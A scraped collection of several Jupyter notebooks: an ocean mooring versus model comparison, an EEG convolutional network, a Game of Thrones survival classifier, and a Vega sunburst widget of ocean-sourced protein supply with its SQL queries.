mpl.rc('font', size=fs)
mpl.rc('font', family='sans-serif', weight='normal', style='normal')
import warnings
#warnings.filterwarnings('ignore')
from IPython.display import Markdown, display
%matplotlib inline
ptrcloc='/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data'
modver='HC201905' #HC202007 is the other option.
gridloc='/ocean/kflanaga/MEOPAR/savedData/201905_grid_data'
ORCAloc='/ocean/kflanaga/MEOPAR/savedData/ORCAData'
year=2019
mooring='Twanoh'
# Parameters
year = 2015
modver = "HC201905"
mooring = "Hansville"
ptrcloc = "/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data"
gridloc = "/ocean/kflanaga/MEOPAR/savedData/201905_grid_data"
ORCAloc = "/ocean/kflanaga/MEOPAR/savedData/ORCAData"
orca_dict=io.loadmat(f'{ORCAloc}/{mooring}.mat')
def ORCA_dd_to_dt(date_list):
UTC=[]
for yd in date_list:
if np.isnan(yd):
UTC.append(float("NaN"))
else:
start = dt.datetime(1999,12,31)
delta = dt.timedelta(yd)
offset = start + delta
time=offset.replace(microsecond=0)
UTC.append(time)
return UTC
obs_tt=[]
for i in range(len(orca_dict['Btime'][1])):
obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))
#I should also change this obs_tt thing I have here into datetimes
YD_rounded=[]
for yd in obs_tt:
if np.isnan(yd):
YD_rounded.append(float("NaN"))
else:
YD_rounded.append(math.floor(yd))
obs_dep=[]
for i in orca_dict['Bdepth']:
obs_dep.append(np.nanmean(i))
grid=xr.open_mfdataset(gridloc+f'/ts_{modver}_{year}_{mooring}.nc')
tt=np.array(grid.time_counter)
mod_depth=np.array(grid.deptht)
mod_votemper=(grid.votemper.isel(y=0,x=0))
mod_vosaline=(grid.vosaline.isel(y=0,x=0))
mod_votemper = (np.array(mod_votemper))
mod_votemper = np.ma.masked_equal(mod_votemper,0).T
mod_vosaline = (np.array(mod_vosaline))
mod_vosaline = np.ma.masked_equal(mod_vosaline,0).T
def Process_ORCA(orca_var,depths,dates,year):
# Transpose the columns so that a yearday column can be added.
df_1=pd.DataFrame(orca_var).transpose()
df_YD=pd.DataFrame(dates,columns=['yearday'])
df_1=pd.concat((df_1,df_YD),axis=1)
#Group by yearday so that you can take the daily mean values.
dfg=df_1.groupby(by='yearday')
df_mean=dfg.mean()
df_mean=df_mean.reset_index()
# Convert the yeardays to datetime UTC
UTC=ORCA_dd_to_dt(df_mean['yearday'])
df_mean['yearday']=UTC
# Select the range of dates that you would like.
df_year=df_mean[(df_mean.yearday >= dt.datetime(year,1,1))&(df_mean.yearday <= dt.datetime(year,12,31))]
df_year=df_year.set_index('yearday')
#Add in any missing date values
idx=pd.date_range(df_year.index[0],df_year.index[-1])
df_full=df_year.reindex(idx,fill_value=-1)
#Transpose again so that you can add a depth column.
df_full=df_full.transpose()
df_full['depth']=obs_dep
# Remove any rows that have NA values for depth.
df_full=df_full.dropna(how='all',subset=['depth'])
df_full=df_full.set_index('depth')
#Mask any NA values and any negative values.
df_final=np.ma.masked_invalid(np.array(df_full))
df_final=np.ma.masked_less(df_final,0)
return df_final, df_full.index, df_full.columns
```
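The yearday conversion in `ORCA_dd_to_dt` treats each value as a fractional day offset from an epoch of 1999-12-31 and then drops microseconds; the same arithmetic standalone:

```python
import datetime as dt

def yearday_to_utc(yd, epoch=dt.datetime(1999, 12, 31)):
    # a fractional yearday is a day offset from the epoch; drop microseconds
    return (epoch + dt.timedelta(days=yd)).replace(microsecond=0)

print(yearday_to_utc(1.0))    # 2000-01-01 00:00:00
print(yearday_to_utc(366.5))  # 2000-12-31 12:00:00
```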
## Map of Buoy Location.
```
lon,lat=places.PLACES[mooring]['lon lat']
fig, ax = plt.subplots(1,1,figsize = (6,6))
with nc.Dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/bathymetry_201702.nc') as bathy:
viz_tools.plot_coastline(ax, bathy, coords = 'map',isobath=.1)
color=('firebrick')
ax.plot(lon, lat,'o',color = 'firebrick', label=mooring)
ax.set_ylim(47, 49)
ax.legend(bbox_to_anchor=[1,.6,0.45,0])
ax.set_xlim(-124, -122);
ax.set_title('Buoy Location');
```
## Temperature
```
df,dep,tim= Process_ORCA(orca_dict['Btemp'],obs_dep,YD_rounded,year)
date_range=(dt.datetime(year,1,1),dt.datetime(year,12,31))
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Temperature Series',
var_title='Temperature ($^\circ$C)',vmax=23,vmin=8,cmap=cmo.cm.thermal)
ax=ket.hovmoeller(mod_votemper, mod_depth, tt, (2,15),date_range, title='Modeled Temperature Series',
var_title='Temperature ($^\circ$C)',vmax=23,vmin=8,cmap=cmo.cm.thermal)
```
# Salinity
```
df,dep,tim= Process_ORCA(orca_dict['Bsal'],obs_dep,YD_rounded,year)
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Absolute Salinity Series',
var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)
ax=ket.hovmoeller(mod_vosaline, mod_depth, tt, (2,15),date_range,title='Modeled Absolute Salinity Series',
var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)
grid.close()
bio=xr.open_mfdataset(ptrcloc+f'/ts_{modver}_{year}_{mooring}.nc')
tt=np.array(bio.time_counter)
mod_depth=np.array(bio.deptht)
mod_flagellates=(bio.flagellates.isel(y=0,x=0))
mod_ciliates=(bio.ciliates.isel(y=0,x=0))
mod_diatoms=(bio.diatoms.isel(y=0,x=0))
mod_Chl = np.array((mod_flagellates+mod_ciliates+mod_diatoms)*1.8)
mod_Chl = np.ma.masked_equal(mod_Chl,0).T
df,dep,tim= Process_ORCA(orca_dict['Bfluor'],obs_dep,YD_rounded,year)
ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Chlorophyll Series',
var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)
ax=ket.hovmoeller(mod_Chl, mod_depth, tt, (2,15),date_range,title='Modeled Chlorophyll Series',
var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)
bio.close()
```
|
github_jupyter
|
```
import torch
import torch.utils.data
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import numpy as np
import h5py
from data_utils import get_data
import matplotlib.pyplot as plt
from solver_pytorch import Solver
# Load data from all .mat files, combine them, eliminate EOG signals, shuffle and
# separate training data, validation data and testing data.
# Also do mean subtraction on x.
data = get_data('../project_datasets',num_validation=100, num_test=100)
for k in data.keys():
print('{}: {} '.format(k, data[k].shape))
# Flatten module to connect the conv output to the FC layer
class Flatten(nn.Module):
def forward(self, x):
N, C, H = x.size() # read in N, C, H
return x.view(N, -1)
# turn x and y into torch type tensor
dtype = torch.FloatTensor
X_train = Variable(torch.Tensor(data.get('X_train'))).type(dtype)
y_train = Variable(torch.Tensor(data.get('y_train'))).type(torch.IntTensor)
X_val = Variable(torch.Tensor(data.get('X_val'))).type(dtype)
y_val = Variable(torch.Tensor(data.get('y_val'))).type(torch.IntTensor)
X_test = Variable(torch.Tensor(data.get('X_test'))).type(dtype)
y_test = Variable(torch.Tensor(data.get('y_test'))).type(torch.IntTensor)
# train a 1D convolutional neural network
# optimize hyper parameters
best_model = None
parameters =[] # a list of dictionaries
parameter = {} # a dictionary
best_params = {} # a dictionary
best_val_acc = 0.0
# hyper parameters in model
filter_nums = [20]
filter_sizes = [12]
pool_sizes = [4]
# hyper parameters in solver
batch_sizes = [100]
lrs = [5e-4]
for filter_num in filter_nums:
for filter_size in filter_sizes:
for pool_size in pool_sizes:
linear_size = int((X_test.shape[2]-filter_size)/4)+1
linear_size = int((linear_size-pool_size)/pool_size)+1
linear_size *= filter_num
for batch_size in batch_sizes:
for lr in lrs:
model = nn.Sequential(
nn.Conv1d(22, filter_num, kernel_size=filter_size, stride=4),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.BatchNorm1d(num_features=filter_num),
nn.MaxPool1d(kernel_size=pool_size, stride=pool_size),
Flatten(),
nn.Linear(linear_size, 20),
nn.ReLU(inplace=True),
nn.Linear(20, 4)
)
model.type(dtype)
solver = Solver(model, data,
lr = lr, batch_size=batch_size,
verbose=True, print_every=50)
solver.train()
# save training results and parameters of neural networks
# build a fresh dict each iteration so entries already stored
# in `parameters` are not overwritten by reference
parameter = {'filter_num': filter_num,
'filter_size': filter_size,
'pool_size': pool_size,
'batch_size': batch_size,
'lr': lr}
parameters.append(parameter)
print('Accuracy on the validation set: ', solver.best_val_acc)
print('parameters of the best model:')
print(parameter)
if solver.best_val_acc > best_val_acc:
best_val_acc = solver.best_val_acc
best_model = model
best_solver = solver
best_params = parameter
# Plot the loss function and train / validation accuracies of the best model
plt.subplot(2,1,1)
plt.plot(best_solver.loss_history)
plt.title('Training loss history')
plt.xlabel('Iteration')
plt.ylabel('Training loss')
plt.subplot(2,1,2)
plt.plot(best_solver.train_acc_history, '-o', label='train accuracy')
plt.plot(best_solver.val_acc_history, '-o', label='validation accuracy')
plt.xlabel('Iteration')
plt.ylabel('Accuracies')
plt.legend(loc='upper center', ncol=4)
plt.gcf().set_size_inches(10, 10)
plt.show()
print('Accuracy on the validation set: ', best_val_acc)
print('parameters of the best model:')
print(best_params)
# test set
y_test_pred = best_model(X_test)  # evaluate the best model found during the search
_, y_pred = torch.max(y_test_pred,1)
test_accu = np.mean(y_pred.data.numpy() == y_test.data.numpy())
print('Test accuracy', test_accu, '\n')
```
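The `linear_size` computation above follows the standard 1-D convolution/pooling output-length formula with no padding, floor((L - kernel) / stride) + 1. A standalone sketch using the notebook's defaults (kernel 12 / stride 4 for the conv, 4 / 4 for the pool, 20 filters); the input length `L` here is hypothetical:

```python
def out_len(length, kernel, stride):
    # output length of a 1-D conv or pool layer with no padding
    return (length - kernel) // stride + 1

L = 1000                        # hypothetical number of input time samples
after_conv = out_len(L, 12, 4)  # conv kernel 12, stride 4
after_pool = out_len(after_conv, 4, 4)
flat = after_pool * 20          # times the number of conv filters

print(after_conv, after_pool, flat)  # 248 62 1240
```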
|
github_jupyter
|
```
from sklearn import datasets # sklearn is one of the most widely used ML libraries; besides the
# datasets, it contains many other functions that are useful for data analysis
# this library will be your companion throughout your whole career
import pandas as pd # imports the Pandas library, used to work with dataframes (TABLES)
# in a friendlier way
from sklearn.model_selection import train_test_split,KFold,cross_val_score, cross_val_predict # used to split the
# dataset into training and test groups
from sklearn.svm import SVC # imports the SVM algorithm
from sklearn import tree # imports the decision tree algorithm
from sklearn.linear_model import LogisticRegression # imports the logistic regression algorithm
from sklearn.metrics import mean_absolute_error # used to compute the MAE
from sklearn.metrics import mean_squared_error # used to compute the MSE
from sklearn.metrics import r2_score # used to compute R2
from sklearn import metrics # used for the metrics comparing the methods
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn import svm
from google.colab import drive
drive.mount('/content/drive')
got_dataset=pd.read_csv('/content/drive/My Drive/Colab Notebooks/IGTI/app_comparacao_modelo_cap_4/character-predictions.csv')
##../input/game-of-thrones/character-predictions.csv') # reads the dataset
got_dataset.info() # getting to know the dataset
got_dataset.head() # displaying the dataset
nans = got_dataset.isna().sum() # counting the number of null values
print(nans[nans > 0])
print("-------")
print(nans)
# dataset size
len(got_dataset)
got_dataset.describe()
# inspecting the null data
print(got_dataset["age"].mean()) # possible error in our dataset (a negative mean age?)
# taking a closer look at the dataset
print(got_dataset["name"][got_dataset["age"] < 0])
print("---")
print(got_dataset['age'][got_dataset['age'] < 0])
# replacing the negative values
got_dataset.loc[1684, "age"] = 25.0
got_dataset.loc[1868, "age"] = 0.0
print(got_dataset["age"].mean()) # checking the age again
# handling null data
got_dataset["age"].fillna(got_dataset["age"].mean(), inplace=True) # replacing nulls with the column mean
got_dataset["culture"].fillna("", inplace=True) # filling nulls in the culture column with an empty string
# filling the remaining null values with -1
got_dataset.fillna(value=-1, inplace=True)
# drawing the boxplot
got_dataset.boxplot(['alive','popularity'])
# analyzing character "mortality"
import warnings
warnings.filterwarnings('ignore')
f,ax=plt.subplots(2,2,figsize=(17,15))
sns.violinplot("isPopular", "isNoble", hue="isAlive", data=got_dataset ,split=True, ax=ax[0, 0])
ax[0, 0].set_title('Noble and Popular vs Mortality')
ax[0, 0].set_yticks(range(2))
sns.violinplot("isPopular", "male", hue="isAlive", data=got_dataset ,split=True, ax=ax[0, 1])
ax[0, 1].set_title('Male and Popular vs Mortality')
ax[0, 1].set_yticks(range(2))
sns.violinplot("isPopular", "isMarried", hue="isAlive", data=got_dataset ,split=True, ax=ax[1, 0])
ax[1, 0].set_title('Married and Popular vs Mortality')
ax[1, 0].set_yticks(range(2))
sns.violinplot("isPopular", "book1", hue="isAlive", data=got_dataset ,split=True, ax=ax[1, 1])
ax[1, 1].set_title('Book_1 and Popular vs Mortality')
ax[1, 1].set_yticks(range(2))
plt.show()
# Dropping some columns
drop = ["S.No", "pred", "alive", "plod", "name", "isAlive", "DateoFdeath"]
got_dataset.drop(drop, inplace=True, axis=1)
# Saving a copy of the dataset before applying the one-hot encoder
got_dataset_2 = got_dataset.copy(deep=True)
# converting the categorical data with one-hot encoding
got_dataset = pd.get_dummies(got_dataset)
got_dataset.head(10)
got_dataset.shape
# Splitting the dataset into inputs and outputs
x = got_dataset.iloc[:,1:].values
y = got_dataset.iloc[:, 0].values
print(x.shape)
print(y.shape)
```
**Building the algorithm pipeline**
```
# applying cross-validation
# splits the dataset into 5 different folds
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
print(kfold.get_n_splits())
# building the classification models
modelos = [LogisticRegression(solver='liblinear'), RandomForestClassifier(n_estimators=400, random_state=42),
DecisionTreeClassifier(random_state=42), svm.SVC(kernel='rbf', gamma='scale', random_state=42),
KNeighborsClassifier()]
# running the cross-validation
mean=[]
std=[]
for model in modelos:
result = cross_val_score(model, x, y, cv=kfold, scoring="accuracy", n_jobs=-1)
mean.append(result) # keep the full score array so its distribution can be plotted
std.append(result.std())
classificadores=['Logistic Regression', 'Random Forest', 'Decision Tree', 'SVM', 'KNN']
plt.figure(figsize=(12, 12))
for i in range(len(mean)):
sns.distplot(mean[i], hist=False, kde_kws={"shade": True})
plt.title("Accuracy distribution of each classifier", fontsize=15)
plt.legend(classificadores)
plt.xlabel("Accuracy", labelpad=20)
plt.yticks([])
plt.show()
```
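The 5-fold split that `KFold(n_splits=5, shuffle=True)` produces can be sketched by hand: shuffle the indices, deal them into 5 nearly equal folds, and use each fold once as the held-out set while the rest train. This is a minimal sketch of the idea, not sklearn's exact fold assignment:

```python
import random

def kfold_indices(n, k, seed=42):
    # shuffle the indices, then deal them round-robin into k folds
    idx = list(range(n))
    random.Random(seed).shuffle(idx)
    folds = [idx[i::k] for i in range(k)]
    splits = []
    for i in range(k):
        test = folds[i]
        train = [j for f in folds[:i] + folds[i + 1:] for j in f]
        splits.append((train, test))
    return splits

splits = kfold_indices(10, 5)
print(len(splits))  # 5
# every index appears exactly once across train + test of each split
print(sorted(splits[0][0] + splits[0][1]))
```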
**Making predictions with the classifiers**
**Which algorithms should we choose?**
```
# Splitting the dataset into 80% training and 20% test
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, stratify=y,
shuffle=True, random_state=42)
# choosing SVM and random forest
svm_clf = svm.SVC(C=0.9, gamma=0.1, kernel='rbf', probability=True, random_state=42)
rf_clf = RandomForestClassifier(n_estimators=400, n_jobs=-1, random_state=42)
# Train the models
svm_clf.fit(x_train, y_train)
rf_clf.fit(x_train, y_train)
# get the predicted probabilities
svm_prob = svm_clf.predict_proba(x_test)
rf_prob = rf_clf.predict_proba(x_test)
# predicted classes (argmax of the probabilities)
svm_preds = np.argmax(svm_prob, axis=1)
rf_preds = np.argmax(rf_prob, axis=1)
# evaluating the models
cm = metrics.confusion_matrix(y_test, svm_preds)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
cm2 = metrics.confusion_matrix(y_test, rf_preds)
cm2 = cm2.astype('float') / cm2.sum(axis=1)[: , np.newaxis]
classes = ["Dead", "Alive"]
f, ax = plt.subplots(1, 2, figsize=(15, 5))
ax[0].set_title("SVM", fontsize=15.)
sns.heatmap(pd.DataFrame(cm, index=classes, columns=classes),
cmap='winter', annot=True, fmt='.2f', ax=ax[0]).set(xlabel="Predicted", ylabel="Actual")
ax[1].set_title("Random Forest", fontsize=15.)
sns.heatmap(pd.DataFrame(cm2, index=classes, columns=classes),
cmap='winter', annot=True, fmt='.2f', ax=ax[1]).set(xlabel="Predicted",
ylabel="Actual")
```
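The `cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]` step row-normalizes each confusion matrix so every row shows the fraction of that true class assigned to each prediction. The same operation without NumPy, on made-up counts:

```python
def row_normalize(cm):
    # divide each entry of the confusion matrix by its row total
    return [[c / sum(row) for c in row] for row in cm]

cm = [[40, 10],   # true "Dead": 40 predicted dead, 10 predicted alive
      [5, 45]]    # true "Alive": 5 predicted dead, 45 predicted alive
print(row_normalize(cm))  # [[0.8, 0.2], [0.1, 0.9]]
```

Normalizing by row keeps the diagonal interpretable as per-class recall even when the classes are imbalanced.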
|
github_jupyter
|
# Blue Food
Visualizing protein supply, and how the practices generating that protein supply affect the ocean, using a hierarchical relationship.
Note that this is a parameterized widget; the specification passed to the API will not be renderable without the geostore identifier being inserted.
*Author: Rachel Thoms
<br>Created: 08 24 2021
<br>Environment: jupyterlab*
## Style
- Vega chart
- Chart type: [Sunburst](https://vega.github.io/vega/examples/sunburst/)
- Value: Protein Supply (g/capita/day)
## Data
- Data: [ocn_calcs_015_blue_food_protein_supply](https://resourcewatch.carto.com/u/wri-rw/dataset/ocn_calcs_015_blue_food_protein_supply)
- Resource Watch: [explore page](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- Source: [FAO Food Balance Sheet](http://www.fao.org/faostat/en/#data/FBS)
## Preparation
### Vega
```
import json
from vega import Vega
from IPython.display import display
def Vega(spec):
bundle = {}
bundle['application/vnd.vega.v5+json'] = spec
display(bundle, raw=True)
widget_width = 600
widget_height = 600
```
## Visualization
### Queries
#### Testing
`gid_0 = 'JPN'` used as a stand-in for the parameterized `geostore_id={{geostore_id}}` in the production version
```sql
SELECT alias.iso as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product
FROM
(SELECT * FROM foo_061_rw1_blue_food_supply_edit) data
INNER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
WHERE iso='JPN'
ORDER BY analysis_category ASC, id ASC
```
#### Parameterization
```sql
SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product
FROM
(SELECT * FROM foo_061_rw1_blue_food_supply_edit) data
LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'
ORDER BY analysis_category ASC, id ASC
```
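The `{{geostore_env}}` / `{{geostore_id}}` placeholders are substituted client-side before the query is sent, just as the notebook later does for the Vega spec's data URL. A sketch of that substitution (the table name is illustrative; the geostore id is the one used later in this notebook):

```python
# hypothetical parameterized query template
template = ("SELECT * FROM some_table WHERE gadm.{{geostore_env}} "
            "ILIKE '{{geostore_id}}'")

# fill in the environment column and geostore identifier
query = (template
         .replace('{{geostore_env}}', 'geostore_prod')
         .replace('{{geostore_id}}', 'f653d0a434168104f4bdcdf8c712d079'))

print(query)
```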
```
spec=json.loads("""{
"$schema": "https://vega.github.io/schema/vega/v5.json",
"padding": 5,
"autosize": "pad",
"signals": [
{
"name": "year",
"value": 2018,
"bind": {"input": "range", "min": 1961, "max": 2018, "step": 1}
}
],
"data": [
{
"name": "table",
"url": "https://wri-rw.carto.com/api/v2/sql?q= SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product FROM (SELECT * FROM ocn_calcs_015_blue_food_protein_supply) data LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' ORDER BY analysis_category ASC, id ASC, year DESC",
"format": {"type": "json", "property": "rows"},
"transform": [
{"type": "filter", "expr": "datum.year==year"},
{"type": "stratify", "key": "id", "parentKey": "parent"},
{
"type": "partition",
"field": "size",
"sort": {"field": ["analysis_category"]},
"size": [{"signal": "2 * PI"}, {"signal": "width/4"}],
"as": ["a0", "r0", "a1", "r1", "depth", "children"],
"padding": 0
},
{"type": "formula", "expr": "split(datum.id,'_')[0]", "as": "label"},
{"type": "formula", "expr": "datum.protein ? format((datum.protein), '.1f') + ' g/capita/day' : ''", "as": "protein"}
]
}
],
"scales": [
{
"name": "legend",
"type": "ordinal",
"domain": ["Total food supply", "Pressure-generating, land-sourced foods","Ocean-sourced foods", "Other land-sourced foods"],
"range": ["#f3b229","#f5c93a","#2670a5","#e8d59a"]
},
{
"name": "blues",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"range": ["#2670a5", "#3d7fae", "#538fb7", "#699fc0"],
"domainMin": 1,
"reverse": false
},
{
"name": "greys",
"type": "ordinal",
"domain": {"data": "table", "field": "depth"},
"range": ["#f2e2b2", "#f7e9be", "#fcf0ca","#e8d59a"]
},
{
"name": "oranges",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"range": ["#f3b229", "#f4c141", "#f5c93a", "#f6d544", "#f6e04e"],
"domainMin": 1,
"reverse": false
},
{"name": "opacity",
"type": "linear",
"domain": {"data": "table", "field": "depth"},
"domainMin": 1,
"reverse": true,
"range": [0.85,1]}
],
"marks": [
{
"type": "arc",
"from": {"data": "table"},
"encode": {
"enter": {
"x": {"signal": "width/3"},
"y": {"signal": "height/2"},
"zindex": {"value": 1},
"opacity": [{"test": "test(/Secondary/, datum.product)", "value": 0.5 },{"value": 1}],
"fill": [
{
"scale": {
"signal":
"(datum.analysis_category === 'Other Land-Sourced Foods' ? 'greys': datum.analysis_category === 'Ocean-Sourced Foods' ? 'blues' : 'oranges')"
},
"field": "depth"
}
]
},
"update": {
"startAngle": {"field": "a0"},
"endAngle": {"field": "a1"},
"innerRadius": {"field": "r0"},
"outerRadius": {"field": "r1"},
"stroke": {"value": "white"},
"strokeWidth": {"value": 0.5},
"zindex": {"value": 1}
},
"hover": {
"stroke": {"value": "red"},
"strokeWidth": {"value": 2},
"zindex": {"value": 0}
}
}
}
],
"legends": [
{
"title": ["Sources of Protein"],
"orient": "none",
"legendX": {"signal" : "width*.65"},
"legendY": {"signal" : "height*.4"},
"type": "symbol",
"fill": "legend",
"titleFontSize": {"signal": "width/40"},
"titleFont": "Lato",
"labelFontSize": {"signal": "width/50"},
"labelFont": "Lato",
"clipHeight": 16,
"encode": {
"labels": {
"interactive": true,
"enter": {
"tooltip": {
"signal": "datum.label"
}
},
"update": {
"fill": {"value": "grey"}
},
"hover": {
"fill": {"value": "firebrick"}
}
}
}
}
],
"interaction_config": [
{
"name": "tooltip",
"config": {
"fields": [
{
"column": "label",
"property": "Commodity",
"type": "text",
"format": ""
},
{
"column": "protein",
"property": "Contribution to protein supply",
"type": "text",
"format": ""
}
]
}
}
]
}
""")
vega_view=dict(spec)
vega_view['legends'][0]['labelFont'] = 'Arial'
vega_view['legends'][0]['titleFont'] = 'Arial'
vega_view['height'] = widget_height
vega_view['width'] = widget_width
vega_view['data'][0]['url']= vega_view['data'][0]['url'].replace('{{geostore_env}}','geostore_prod')
vega_view['data'][0]['url'] = vega_view['data'][0]['url'].replace('{{geostore_id}}','f653d0a434168104f4bdcdf8c712d079')
Vega(vega_view)
```
[Open the Chart in the Vega Editor](https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATONABONHJnaT0AQXEACOAA8kCHABs4OtgDMdSHRBxIocALSWGJkzXFkdipLJokEx0TJABPNgZMHUs2RR0YGjg-RVgaKCCdWSRMKmkQAHcaWXo0AQAGcpl4GjIsNABmSpkHWQDvMpkkKLYIGgAvODQQVvy+snEgiDQAbVBJhCH0MLgkRXziIIYlgCZygEYADhkmL1k0UC8cKOG-byGZBC80fYBOADZ9x6R9ND2jmQQTBwHAvAC+YKk8yMSxAUEi4kwijCGy2sIAwgB5AAy+VO4nOqEu4mumGGEDgZigZJkbFU6mmqBmIAAQgAlTT5ACSABEAHL5LG4mQAUQAKgAJfIAWRFAA1uXyefkRQBlMWCiUCmQAcXZ+T52OVMjFAFU2flTarOTIAFIABQFAF0IU6ZNlcrNoYthrkmGZ8gxFCZhlhcPgiAVlM5FAVKBlFJg2PG2AgCEgcDQSDtOABHEwAflzAF4dKqRdiReixTZPEgIKwxDYIDpaLIAPpVLI5KhrVZSHQrNYDuiIZs6YoDhyKOCIgd9QYDzYmbbjnCKNjArwDpCTExhPoQdsZYFkOJhKcb2QMak6ABibMx0p0AApy5XqzoAFT3x-P2JsJ2nztrG+ztv62ztgBHYQAwOCmGE7ZwAEmAAJTdrkOhcnyfIimyOi2pi2EWAU7ZBIEfTeMeCJIkkLaaKqtYUTomJ8kx9aUOR9Y6KWHq9jOtiYmyPJ4ToLIAJo2HuB40EeJ7kOeOgMeiI6yEpqrovksSKMgZJEiAmBhDgsKiBI+TrnSySGbcbAFNMkIGXcEDaQgXoGUZsKWDQJjAusMgGOuwwegwCDUMUnY8aW8IMIiyIgJCoCGcZwxeT5yT5AF6zoMFoVDooxbFnl8VQu5yXoECfhqJYKIyAA1nAKLoMU5l9oiADSDXDNOs5kglpWwtOahqGZMheZShIgAuDyTXEemgGNJiEsyu5BDJck5ApcUuoCAxLHMk21Huww7N+Oj2lyxWgOMR3oEUJQwAQAAs8VuiA9azG95T5IoX1dPs33-e6IKlDIaSLTOkiva07RkGg5Rgi6r3QEEChuQssJmGQs7nDISWwnE7RBPksipkgzxMiAYqbpk0F2HBCH5PaM4QLBM7OFj4jJDkXhkAOoQEs4YhBk4anQdMMiYk4u6C5EqTITEbBsLI4sgJi9DJCEu6yDLwvy2LICvXcWMfQAxJYDRMDsOyvPkZsCFArwNCgMgmzs7wAOzlEgAi23AhyyAIrwoNt3qwhBqO4x5wyeJzazE6T5OgHxvpIP600LRN8iqDAxUgEbe0gK7Htez7LsNLI7uWEg00mwIDSHJYTDu7b7yvK8lhQF9r0k8gXjSuTXx53ApCKBSaBVyYFJ9ejwxkDOB75HjwwE14RPugnGhJz2Kdp1pSSLUFwM5w5+em5YOxwDslu25Y7twK8TA1x3ljlBkvv+4HwfTzCy-5yrS-oBjqsPycgN4XDkNvdAfoAyjX3pnI+udT4UzNhbK2NsXaWEelAfYj1AaF0sPbR2zt8HvADo9Z6GD3hwHKI9IY3cN79w0IPGcI8x6oAnlPEqM90B0kcHQGq-Vo5eGAfHXum8IGeiganGBIAM6H2zrnHuZNxCMJeDIFhyQ2FIm2Oo3cxsmTlEoIcAQUh9iI2+IoWqjJ9oALeqkLSG5XL6WTlI3eDlZzwnkOAnq6V9K-H0tdImt1ij0AIA0XOjUrqHSCRgOAtQsAEB2LnfoZwDDgOXNscEtIHBQH4W5YEQJfQKEwC+Agqo4DwgJGsMIBABw5UoBZa81JUKohXEsQxAg+oZKWPsBGsCPBuWRgGAJ0SQzoBfPUla+5DzHg2meZE
kVSwAHI1bwHiNiLWzhVSyxFveRWyslk6ALDoJZc8GoQCWagDCIVOLSRmfJeZYRFknMlqscQWydnyzvPsi5RyTnh1+VcpZcQ9EKCWS0hycjsoIL6QZRWPkVDgMCWMyapg6ATJyDcycSz2zgpmOUJ0OgADUr56kWS3LoY5lyTnEoVjpHIL4MWYBueSuJ4hUIDiWZQfYlhwW0sOWQAgGRMy5AINkMIhygXgvig5OCHolhXVyImbQZBhnzTgcMJAX13EEhVWq2RGr0BIH+g5LwnNFBsn8DQBgjJ1XjVuNq2kURkiWoCDa8BUK84msBEiNg9V0lomGAURIwJc4VT9XAAA6iEnO+lulw0oJ0mQKSCRpLjYG1AvSHIwDYCPJFvr-XprabcZCYaC1RpjQG4tqAdgORTfIfxoB42oHhhCWFmNsbWMSnQYZzJtm6xbFYM6G4KUG1pMoHqwxxASGmh2gkCoRkTBiXdegX5KDvB9g5OdshxJItGaGOJdRMBrueg5WxEAwgICYGwEM-SUXbsXj2uA3zESql2nupdKKV0PUeo6gyT6X16RAJoZQa8QChEfiYQDb7BgfpuoUGNBAKi5wg5SQDwwQOBFvXCTwOAJSHvqJm94-lxCeIVeB1OlJbUgC8L5RwahSBoG0XAEjvlwFJhvWoUEi74P1NQyGCEMg5UbQ9d5MZTaM0gDOSiQTGBc2+PVQMotmT0BeRnEwZQUBaoyrbS6IAA)
# Indicator
## Rank
Query:
```sql
SELECT
CONCAT(rank, ' of ', max_rank)
FROM (
SELECT
gid_0,
geostore_prod,
rank,
MAX(rank) OVER (PARTITION BY true) AS max_rank
FROM (
SELECT
gid_0,
geostore_prod,
RANK() OVER(ORDER BY prop DESC) as rank
FROM (
SELECT
area,
SUM(
CASE
WHEN item = 'Ocean-Sourced Foods' THEN value
ELSE 0
END)/
NULLIF(
SUM(
CASE
WHEN item = 'Grand Total' THEN value
ELSE 0
END),0) prop
FROM ocn_calcs_015_blue_food_protein_supply
WHERE year = 2018 GROUP BY area) data
LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE prop is not null AND coastal = true) ranked
GROUP BY rank, geostore_prod, gid_0) max_rank
WHERE {{geostore_env}} ILIKE '{{geostore_id}}'
```
